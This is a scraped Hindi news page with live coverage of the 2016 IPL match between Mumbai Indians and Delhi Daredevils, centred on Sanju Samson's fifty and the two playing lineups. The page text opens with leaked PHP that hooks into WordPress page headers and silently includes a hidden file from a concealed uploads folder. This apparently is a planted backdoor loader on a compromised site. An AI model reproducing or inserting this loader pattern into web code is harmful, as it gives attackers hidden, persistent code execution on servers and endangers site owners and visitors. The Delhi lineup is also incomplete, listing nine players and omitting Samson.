add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); IPL-9 Live MIvsDD: दिल्ली की पारी को सैमसन संभाला, लगाई फिफ्टी – SOCH INDIA
Menu

खेल
IPL-9 Live MIvsDD: दिल्ली की पारी को सैमसन संभाला, लगाई फिफ्टी

nobanner

मुंबई इंडियंस ने शनिवार को फिरोजशाह कोटला मैदान पर मेजबान दिल्ली डेयरडेविल्स के साथ जारी इंडियन प्रीमियर लीग के 17वें मकाबले में टॉस जीतकर पहले गेंदबाजी करने का फैसला किया है. यह दिल्ली का चौथा और मुंबई का छठा मैच है. दिल्ली ने पहला मैच गंवाने के बाद लगातार दो मैच जीते हैं. उसे लगातार तीसरी जीत की तलाश है.
टॉस हारकर पहले खेलने उतरी दिल्ली को शुरुआती झटकों का सामना करना पड़ा है. दिल्ली ने 8 ओवरों में तीन विकेट 54 रन पर खो दिए थे. दोनों ओपनर डी कॉक (9) और श्रेयस अय्यर (19) आउट हुए. करुण नायर भी 5 रन बनाकर वापस लौट चुके हैं. बाद में संजू सैमसन ने पारी को संभालते हुए टीम को मुसीबत से निकाला. दिल्ली ने 17 ओवरों में चार विकेट पर 130 रन बना लिए हैं. सैमसन 60 रन बनाकर आउट हो गए. डुमिनी 35 रन बनाकर खेल रहे हैं. मैकक्लानेघन को दो, हार्दिक पंड्या और हरभजन सिंह को एक-एक सफलता मिली है.

दूसरी ओर, मुंबई को पांच में से दो मैचों में जीत मिली है, लेकिन तीन मैचों में उसे हार का स्वाद चखना पड़ा है.तालिका में दिल्ली चौथे और मुंबई छठे स्थान पर है.

दिल्ली डेयरडेविल्स: क्विंटन डी कॉक, श्रेयस अय्यर, करुण नायर, ज्यां पॉल ड्यूमिनी, क्रिस मौरिस, पवन नेगी, जहीर खान (कप्तान), मोहम्मद समी, इमरान ताहिर

मुंबई इंडियंस: रोहित शर्मा (कप्तान), पार्थिव पटेल, हार्दिक पंड्या, जोस बटलर, अंबाती रायडू, केरन पोलार्ड, हरभजन सिंह, कुणाल पंड्या, टिम साउदी, मिशेल मैकक्लानेघन और जसप्रीत बुमराह